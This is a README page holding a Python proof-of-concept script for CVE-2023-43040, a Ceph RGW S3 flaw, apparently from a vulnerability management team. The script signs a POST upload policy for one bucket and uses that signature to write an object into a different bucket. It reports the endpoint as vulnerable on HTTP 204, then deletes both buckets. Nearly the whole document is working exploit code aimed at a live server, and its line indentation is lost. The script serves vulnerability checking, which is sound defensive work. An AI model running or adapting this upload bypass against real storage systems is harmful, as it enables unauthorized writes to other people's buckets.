README.md
Rendering markdown...
import base64
import datetime
import hashlib
import hmac
import json
import uuid
import boto3
import pytz
import requests
from botocore.client import Config
def connect(access_key, secret_key, endpoint, is_secure, ssl_verify):
return boto3.client(service_name='s3',
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
endpoint_url=endpoint,
use_ssl=is_secure,
verify=ssl_verify,
config=Config(signature_version='s3v4'))
def create_bucket(connection, bucket_name):
bucket_name = bucket_name[0:10]
print("[I] Creating bucket: {}".format(bucket_name))
bucket_creating = connection.create_bucket(Bucket=bucket_name)
if bucket_creating['ResponseMetadata']['HTTPStatusCode'] == 200:
return bucket_name
print("[E] Bucket creation failed!")
print(bucket_creating)
def delete_bucket(connection, bucket_name):
response = connection.list_objects_v2(
Bucket=bucket_name,
)
while response['KeyCount'] > 0:
response = connection.delete_objects(
Bucket=bucket_name,
Delete={
'Objects': [{'Key': obj['Key']} for obj in response['Contents']]
}
)
response = connection.list_objects_v2(
Bucket=bucket_name,
)
response = connection.delete_bucket(
Bucket=bucket_name
)
if response['ResponseMetadata']['HTTPStatusCode'] == 204:
print("[I] Bucket deleted successfully! {}".format(bucket_name))
return
print("[E] Bucket deletion failed!")
print(response)
def generate_policy(bucket_name):
expires = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=+6000)
policy_document = {
"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
"conditions": [
{"bucket": bucket_name},
["starts-with", "$key", "foo"],
{"acl": "private"},
["starts-with", "$Content-Type", "text/plain"],
["content-length-range", 0, 1024]
]
}
return base64.b64encode(bytes(json.JSONEncoder().encode(policy_document), 'utf-8'))
def sign_policy(policy, secret_key):
return base64.b64encode(
hmac.new(bytes(secret_key, 'utf-8'), policy,
hashlib.sha1).digest())
def post_object(endpoint, bucket_name, bad_bucket_name, policy, access_key, signature, ssl):
payload = {
"key": "${filename}",
'bucket': bucket_name,
"AWSAccessKeyId": access_key,
"signature": signature,
"acl": "private",
"policy": policy,
"Content-Type": "text/plain",
'file': ('foo.txt', 'bar')
}
return requests.post("{}/{}".format(endpoint, bad_bucket_name), files=payload, verify=ssl)
if __name__ == '__main__':
print(
" ______ ______ ___ ___ ___ ____ ____ ____ ___ ____ ___ \n / ___/ | / / __/___|_ |/ _ \|_ ||_ /___/ / /|_ // _ \/ / // _ \ \n/ /__ | |/ / _//___/ __// // / __/_/_ <___/_ _//_ </ // /_ _/ // /\n\___/ |___/___/ /____/\___/____/____/ /_//____/\___/ /_/ \___/ \nCEPH RGW S3 CVE-2023-43040 PoC\nby Trendyol Vulnerability Management Team - @riza.sabuncu\n")
bucket_name_prefix = "bckt"
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description="RGW S3 CVE-2023-43040 PoC")
parser.add_argument('--access_key', type=str, help="RGW Access Key")
parser.add_argument('--secret_key', type=str, help="RGW Secret Key")
parser.add_argument('--endpoint', type=str, help="RGW S3 Endpoint")
parser.add_argument('--is_secure', type=bool, nargs='?', const=False, default=False,
help="SSL (default: False)")
parser.add_argument('--ssl_verify', type=bool, nargs='?', const=False, default=False,
help="SSL Verification (default: False)")
args = parser.parse_args()
if not args.access_key or not args.secret_key or not args.endpoint:
parser.print_help(sys.stderr)
sys.exit(1)
if args.endpoint[-1] == '/':
args.endpoint = args.endpoint[:-1]
print("[I] Connecting to RGW S3 Endpoint: {}".format(args.endpoint))
connection = connect(args.access_key,
args.secret_key,
args.endpoint,
args.is_secure,
args.ssl_verify)
new_bucket = create_bucket(connection,
"{}{}".format(
bucket_name_prefix,
uuid.uuid4().hex))
bad_bucket = create_bucket(connection,
"{}{}".format(
bucket_name_prefix,
uuid.uuid4().hex))
policy = generate_policy(new_bucket)
signature = sign_policy(policy, args.secret_key)
post_status = post_object(args.endpoint,
new_bucket,
bad_bucket,
policy,
args.access_key,
signature,
args.ssl_verify)
if post_status.status_code == 204:
print("[🚨] Vulnerable! Status code: {}".format(post_status.status_code))
else:
print("[✅] Not vulnerable! Status code: {}".format(post_status.status_code))
delete_bucket(connection, new_bucket)
delete_bucket(connection, bad_bucket)
if __name__ == "__main__":
main()